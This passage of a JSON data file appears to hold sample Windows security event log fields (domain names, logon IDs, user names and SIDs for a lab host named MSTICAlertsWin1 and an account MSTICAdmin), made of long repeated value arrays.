fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\"],\"SubjectDomainName\":[\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"SubjectUserName\":[\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\"],\"SubjectUserSid\":[\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480